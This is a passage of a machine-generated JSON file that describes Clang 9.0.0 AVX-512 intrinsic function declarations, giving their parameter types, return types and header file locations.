"__mmask32" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm512_loadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1729:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_loadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1738:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_loadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1746:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_loadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1755:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_loadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1764:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_loadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1772:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1781:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1790:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1798:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1807:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_test_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1815:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_mm512_mask_test_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1822:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_mm512_test_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1829:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm512_mask_test_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1836:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm512_testn_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1843:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_mm512_mask_testn_epi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1849:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_mm512_testn_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1856:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm512_mask_testn_epi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1863:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm512_movepi8_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1870:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_mm512_movepi16_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1876:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_mm512_movm_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1882:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_movm_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1888:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_broadcastb_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1894:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_broadcastb_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1904:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_broadcastb_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1912:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_set1_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1920:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_set1_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1928:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_broadcastw_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1936:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_broadcastw_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1944:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_broadcastw_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1952:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_permutexvar_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1960:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_permutexvar_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1966:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_permutexvar_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1975:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sad_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:2012:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_popcnt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bitalgintrin.h:21:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_popcnt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bitalgintrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_popcnt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bitalgintrin.h:35:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_popcnt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bitalgintrin.h:43:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_popcnt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bitalgintrin.h:49:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_popcnt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bitalgintrin.h:57:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_bitshuffle_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bitalgintrin.h:65:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_mm512_bitshuffle_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bitalgintrin.h:73:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_mm512_conflict_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:21:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_conflict_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_conflict_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:35:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_conflict_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:43:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_conflict_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:49:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_conflict_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:57:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_lzcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:65:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_lzcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:71:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_lzcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:79:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_lzcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:87:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_lzcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:93:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_lzcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:101:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_broadcastmb_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:109:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_broadcastmw_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:115:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_popcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqintrin.h:22:46", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_popcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqintrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_popcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqintrin.h:33:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_popcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqintrin.h:37:46", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_popcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqintrin.h:42:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_popcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqintrin.h:48:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm_popcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:25:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_popcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_popcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:36:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_popcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:41:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_popcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:46:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_popcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:52:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_popcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:57:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_popcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:62:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_popcnt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:68:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_popcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:73:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_popcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:78:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_popcnt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:84:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_dpbusd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_dpbusd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:29:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": 